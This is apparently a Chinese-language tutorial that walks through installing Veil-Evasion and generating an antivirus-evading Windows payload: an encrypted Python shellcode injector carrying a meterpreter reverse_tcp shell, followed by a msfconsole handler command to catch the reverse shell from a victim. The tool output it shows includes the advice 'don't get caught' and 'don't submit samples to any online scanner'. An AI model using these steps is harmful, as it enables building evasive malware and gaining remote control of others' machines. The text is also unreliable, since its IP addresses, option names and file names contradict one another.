git clone [
下載完成后,我們還需要對其軟件配置包進行安裝,依次輸入如下命令:
ls cd Veil-Evasion/ ls cd setup/ ls ./setup.sh
當安裝至如下位置時,會詢問我們是否繼續安裝,我們輸入 Y 繼續
此時跳出 python for windows 的安裝界面,我們點擊 next 即可。
點擊 next 選擇 yes 繼續安裝。
這里安裝 pywin32-219 我們直接 下一步。
安裝 ruby 環境,我們選擇 accept ,並 next 。安裝 ruby 環境,我們選擇 accept ,並 next 。
這里我們全選中復選框,並點擊 install 開始安裝! 這里我們全選中復選框,並點擊 install 開始安裝
在這個界面,我們可以對該 payload 進行一些基本的配置。例如:編譯后生成文件的格式有效期,並是否進行加密做出配置。這里我選擇使用 pyherion 進行加密
set USE_PYHERION Ygenerate (生成payload)
IP :192.168.5.7 PORT :4444
[*] Executable written to: /usr/share/veil-output/compiled/ir.exe Language: python Payload: python/shellcode_inject/aes_encrypt Shellcode: windows/meterpreter/reverse_tcp Options: LHOST=192.168.40.128 LPROT=4444 Required Options: COMPILE_TO_EXE+Y EXPIRE_PAYLOAD=X INJECT_METHOD+Virtual USE_PYHERIOD=Y Payload File: /usr/share/veil-output/source/fujieace.py Handler File: /usr/share/veil-output/handlers/fujieace_handler.rc [*] Your payload files have been generated,don't get caught! [*] And don't submit samples to any online scanner!
同時新生成的 shellcode 的 rc 文件也被保存在了 veil-output下的 handlers目錄下!既然有了 rc 文件,那么我們就可以方便的利用 MSF 進行調用了!
msfconsole -r vir_handler.rc
此時當目標系統上成功運行我們生成的 shellcode 后,我們將在 kali 上取得目標系統的反彈shell 。